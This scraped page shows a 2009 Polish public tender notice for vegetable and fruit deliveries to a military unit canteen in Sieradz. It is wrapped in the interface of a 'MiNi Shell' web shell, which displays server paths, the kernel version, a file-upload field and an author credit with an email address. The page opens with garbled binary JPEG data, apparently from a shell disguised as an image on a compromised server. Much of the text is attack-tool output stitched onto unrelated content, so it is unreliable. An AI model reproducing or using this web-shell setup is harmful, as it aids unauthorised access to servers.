JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20090918/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20090918/324224-N-2009.html

<p class="kh_header"><b>Sieradz: Dostawy ziemiopłodów i owoców świeżych w latach 2009/2010</b><br>
<b>Numer ogłoszenia: 324224 - 2009; data zamieszczenia: 18.09.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Kasyno przy Jednostce Wojskowej  1551 Sieradz , ul. Wojska Polskiego 78, 98-200 Sieradz, woj. łódzkie, tel. 0-43 6567944, faks 0-43 8261 466.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: kasyno przy jednostce wojskowej.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawy ziemiopłodów i owoców świeżych w latach 2009/2010.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1. Przedmiotem zamówienia są dostawy do magazynu Zamawiającego ziemiopłodów według warzyw świeżych, określonych według wspólnego słownika zamówień (CPV): 15300000-1 owoce, warzywa i podobne produkty; z podziałem na części,                   w następujących ilościach:
Część 1 - - dostawy ziemiopłodów
1.	Buraki ćwikłowe	kg	500
2.	Cebula	kg	500
3.	Czosnek	kg	50
4.	Fasola biała	szt.	1500
5.	Kapusta biała	szt.	1500
6.	Kapusta czerwona	szt.	1200
7.	Kapusta kwaszona	kg	1500
8.	Marchew	kg	800
9.	Ogórki i kwaszone	kg	500
10.	Pietruszka	kg	400
11.	Pory	kg	300
12.	Seler	kg	700
13.	Groch	kg	1500
14.	Jajka	szt.	20000
15.	Susz grzybowy podgrzybek	kg	30
16.	Jabłka	kg	2500
17.	Ziemniaki	kg	20000
Arkusz kalkulacyjny - załącznik nr 2 do SIWZ.
 	Część 2 -- dostawy warzyw świeżych:
1.	Pomidowy świeże krajowe	kg	500
2.	Pomidory świeże import	kg	300
3.	Ogórki świeże spod osłon	kg	500
4.	Kalafior bez liści	szt/kg.	300
5.	Sałata karbowana	szt.	400
6.	Sałata masłowa	szt.	400
7.	Pieczarki świeże	kg	300
8.	Papryka św. czerw. i żółta	kg	300
9.	Rzodkiewka bez liści	pęcz.	300
10.	Fasola szapragowa	kg	200
11.	Kapusta włoska	szt/kg	100
12.	Kapusta pekińska	szt/kg	400
13.	Koperek świeży	pęcz.	300
14.	Natka	pęcz.	400
15	Szczypiorek	pęcz.	300
16	Arbuz	kg	150
17	Banany	kg	600
18	Brzoskwinie	kg	100
19	Cytryny	kg	500
20	Kiwi	kg	100
21	Mandarynka	kg	700
22	Nektarynka	kg	100
23	Pomarańcze	kg	700
24	Winogrona białe	kg	100
25	Winogrona czerwone	kg	150
Arkusz kalkulacyjny - załącznik nr 3 do SIWZ.
Wymagania jakościowe:
Towar ma być świeży , w I gatunku i zgodny ze wskazanymi w SIWZ  normami.
Ogórek kwaszony - dostawy w wiaderkach po 15 kg., w całości, twarde, PN-A-77701:1997
Kapusta kwaszona - dostawy w pojemnikach do 120 kg , PN-A-77700:2006
Ziemniaki - dostawy w workach raszlowych po 15 kg, ziemniaki  o średnicy min 5 cm, bez kłączy i zanieczyszczeń, PN-75/R-74450
Buraki czerwone - dostawy, w workach raszlowych, bez liści, PN-72/R-75360
Cebula - dostawy w workach raszlowych lub luzem w pęczkach bez szczypioru,  PN-72/R-75357
Marchew  - dostawy w workach raszlowych lub luzem w pęczkach bez liści, PN-72/R-75358
Pietruszka - dostawy w workach raszlowych lub luzem w pęczkach bez liści, PN-R-75370:1996
Seler  - dostawy w workach raszlowych lub luzem bez liści, PN-R-75371:1996
Por - dostawy luzem, por powiązany w pęczki, w workach raszlowych PN-R-75521:1996
Kapusta biała  - dostawy w workach raszlowych, PN-68/R-75362
Jabłka krajowe - dostawy w skrzynkach po 15 kg, PN -77/R-75024
Pomidory - dostawy w kartonach po 6 kg.
2. Ceny dla części 1 pozostaną stałe przez cały okres realizacji zamówienia, dla części 2 będą uzależnione od aktualnych cen przedmiotu zamówienia na stronie giełdy owocowo-rolnej www.zjazdowa.pl, korygowanych o współczynnik zadeklarowany przez Wykonawcę w zał. nr 3. Wydruki ze strony giełdowej wykonywane będą 1 i 15 dnia każdego miesiąca i będą obowiązywać do czasu wykonania następnego, w chronologicznej kolejności.
3. Szczegółowy asortyment oraz ilości owoców, warzyw i podobnych produktów   przedstawiają załączniki nr 2, 3 Wycena przedmiotu zamówienia stanowiące integralną część SIWZ.
4. Każdorazowa wielkość poszczególnych dostaw i terminy ich realizacji będą określane przez uprawnionego pracownika Zamawiającego z wyprzedzeniem 1-dniowym. Dostawy będą realizowane w godz.8 00 -12 00. Każdorazowo Wykonawca zobowiązany jest do dostarczenia pełnego asortymentu będącego przedmiotem danego zamówienia pod groźbą kar umownych (zgodnie z wzorem umowy).
5. Przedmiot zamówienia musi być wytworzony i dostarczony zgodnie z niżej wymienionymi normami i przepisami :

- Ustawą z dnia 25 sierpnia 2006 r. o bezpieczeństwie żywności i żywienia 
(Dz. U. 2006.171.1225 z późn. zm.);
- Ustawą z dnia 21 grudnia 2000 r. o jakości handlowej artykułów rolno - spożywczych (Dz. U. 2000.5.44) z późniejszymi zmianami;
- Rozporządzeniem ministra zdrowia z dnia 24 stycznia 2007 r. w sprawie wykazu towarów, które podlegają granicznej kontroli sanitarnej 
(Dz. U. 2007. Nr 20 poz. 122);
- Ustawą z dnia 17 grudnia 2004 r. o rejestracji i ochronie nazw i oznaczeń produktów rolnych i środków spożywczych oraz produktach tradycyjnych 
(Dz. U. 2005 Nr 10 poz. 68)..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 15.30.00.00-1.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 2.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.06.2010.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> Nie dotyczy.<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> 1. O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy: 
1) posiadają uprawnienia do wykonywania określonej działalności lub czynności, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień; 
2) posiadają niezbędną wiedzę i doświadczenie oraz potencjał techniczny, a także dysponują osobami zdolnymi do wykonania zamówienia; 
3) znajdują się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia; 
4) nie podlegają wykluczeniu z postępowania o udzielenie zamówienia na podstawie  art. 24 ust. 1 i 2 ustawy prawo zamówień publicznych.
2. Zamawiający oceni spełnienie warunków udziału w postępowaniu na podstawie oferty oraz załączonych dokumentów i wykluczy z postępowania Wykonawców, którzy:
1) Złożą nieprawdziwe informacje mające wpływ na wynik prowadzonego postępowania;
2) Nie złożą wymaganych oświadczeń o spełnieniu warunków udziału w postępowaniu lub dokumentów potwierdzających spełnienie tych warunków wymienionych w punkcie X SIWZ;
3) Nie zgodzą się na przedłużenie okresu związania ofertą; 
3. Zamawiający wezwie Wykonawców, którzy w wyznaczonym terminie nie złożą dokumentów potwierdzających spełnienie warunków udziału w postępowaniu, lub którzy złożyli dokumenty zawierające błędy, do ich uzupełnienia w wyznaczonym terminie, chyba że mimo ich uzupełnienia konieczne byłoby unieważnienie postępowania (art. 26 ust. 3 Prawa zamówień publicznych).
4. Zamawiający niezwłocznie po wyborze najkorzystniejszej oferty zawiadamia Wykonawcę o wykluczeniu z postępowania o udzielenie zamówienia, podając uzasadnienie faktyczne i prawne. 
5. Ofertę Wykonawcy wykluczonego uznaje się za odrzuconą. 
6. Zamawiający odrzuca ofertę, jeżeli wystąpi przynajmniej jedna przesłanka unormowana w art. 89 ust. 1 Prawa zamówień publicznych w brzmieniu:
1) jest niezgodna z ustawą lub jej treść nie odpowiada treści Specyfikacji Istotnych Warunków Zamówienia.
2) jej złożenie stanowi czyn nieuczciwej konkurencji w rozumieniu przepisów 
o zwalczaniu nieuczciwej konkurencji.
3) zawiera rażąco niską cenę w stosunku do przedmiotu zamówienia. 
4) została złożona przez Wykonawcę wykluczonego z udziału w postępowaniu 
o udzielenie zamówienia lub nie zaproszonego do składania ofert.
5) zawiera omyłki rachunkowe w obliczeniu ceny, których nie można poprawić 
na podstawie art. 88, lub błędy w obliczeniu ceny.  
6) w terminie 7 dni od dnia otrzymania zawiadomienia Wykonawca nie zgodził się 
na poprawienie omyłki rachunkowej w obliczeniu ceny.
7) jest nieważna na podstawie odrębnych przepisów.
7. Zamawiający niezwłocznie po wyborze najkorzystniejszej oferty zawiadamia wszystkich Wykonawców o odrzuceniu ofert, podając uzasadnienie faktyczne i prawne. 
8. Zgodnie z art. 23 ust. p.z.p. Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> 1. W celu potwierdzenia, że Wykonawca posiada uprawnienie do wykonywania określonej działalności lub czynności oraz nie podlega wykluczeniu na podstawie 
art. 24 ustawy z dnia 29.01.2004 r. - Prawo zamówień publicznych Zamawiający żąda, załączenia do oferty:
1) podpisanego oświadczenia o nie podleganiu wykluczeniu z postępowania w sprawie udzielenia zamówienia (art. 24 ust. 2 pkt 3 Prawa zamówień publicznych) według wzoru załącznik nr 6.
2) aktualnego odpisu z właściwego rejestru albo aktualnego zaświadczenia 
o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej, wystawionego nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert (§ 1 ust. 1 pkt 1 rozporządzenia z dnia 19.05.2006 r., Dz. U. Nr 87, poz. 605).
2. Jeżeli Wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium    Rzeczypospolitej Polskiej, zamiast dokumentu, o którym mowa w ust. 1 pkt 2) ,  składa dokument lub dokumenty, wystawione w kraju, w którym ma siedzibę lub miejsce zamieszkania, potwierdzające odpowiednio, że:
1) nie otwarto jego likwidacji ani nie ogłoszono upadłości;
2) nie orzeczono wobec niego zakazu ubiegania się o zamówienie;
3) nie zalega z uiszczaniem podatków, opłat lub składek na ubezpieczenie społeczne lub zdrowotne albo, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu.
3. Jeżeli w kraju pochodzenia osoby lub w kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się dokumentów, o których mowa w ust. 4 pkt 1), 2) i 3), zastępuje się je dokumentem zawierającym oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio kraju pochodzenia osoby lub kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania.
4. W przypadku Wykonawców wspólnie ubiegających się o zamówienie do oferty załączyć dokumenty:
1) Umowę regulującą współpracę Wykonawców występujących wspólnie, w której ustanawia się pełnomocnika do reprezentowania ich w postępowaniu o udzielenie zamówienia albo reprezentowania w postępowaniu i zawarciu umowy w sprawie zamówienia publicznego
2) Oświadczenia i dokumenty wymienione w punktach X.1. - X.4 dla każdego    Wykonawcy z osobna.
Wymagane dokumenty należy przedstawić w formie oryginałów albo kopii. Dokumenty złożone w formie kopii muszą być opatrzone klauzulą za zgodność 
z oryginałem i poświadczone za zgodność z oryginałem przez osobę uprawnioną do reprezentowania Wykonawcy w obrocie gospodarczym..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.15sbwd.internetdsl.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Kasyno przy Jednostce Wojskowej Nr 1551
ul. Wojska Polskiego 78
98-200 Sieradz.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 28.09.2009 godzina 09:00, miejsce: Kasyno przy Jednostce Wojskowej Nr 1551
ul. Wojska Polskiego 78
98-200 Sieradz.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Dostawy ziemiopłodów.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Część 1 - - dostawy ziemiopłodów
1.	Buraki ćwikłowe	kg	500
2.	Cebula	kg	500
3.	Czosnek	kg	50
4.	Fasola biała	szt.	1500
5.	Kapusta biała	szt.	1500
6.	Kapusta czerwona	szt.	1200
7.	Kapusta kwaszona	kg	1500
8.	Marchew	kg	800
9.	Ogórki i kwaszone	kg	500
10.	Pietruszka	kg	400
11.	Pory	kg	300
12.	Seler	kg	700
13.	Groch	kg	1500
14.	Jajka	szt.	20000
15.	Susz grzybowy podgrzybek	kg	30
16.	Jabłka	kg	2500
17.	Ziemniaki	kg	20000

Arkusz kalkulacyjny - załącznik nr 2 do SIWZ..</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.30.00.00-1.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.06.2010.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Dostawy warzyw świeżych.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.	Pomidory świeże krajowe	kg	500
2.	Pomidory świeże import	kg	300
3.	Ogórki świeże spod osłon	kg	500
4.	Kalafior bez liści	szt/kg.	300
5.	Sałata karbowana	szt.	400
6.	Sałata masłowa	szt.	400
7.	Pieczarki świeże	kg	300
8.	Papryka św. czerw. i żółta	kg	300
9.	Rzodkiewka bez liści	pęcz.	300
10.	Fasola szapragowa	kg	200
11.	Kapusta włoska	szt/kg	100
12.	Kapusta pekińska	szt/kg	400
13.	Koperek świeży	pęcz.	300
14.	Natka	pęcz.	400
15	Szczypiorek	pęcz.	300
16	Arbuz	kg	150
17	Banany	kg	600
18	Brzoskwinie	kg	100
19	Cytryny	kg	500
20	Kiwi	kg	100
21	Mandarynka	kg	700
22	Nektarynka	kg	100
23	Pomarańcze	kg	700
24	Winogrona białe	kg	100
25	Winogrona czerwone	kg	150

Arkusz kalkulacyjny - załącznik nr 3 do SIWZ..</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.30.00.00-1.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.06.2010.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com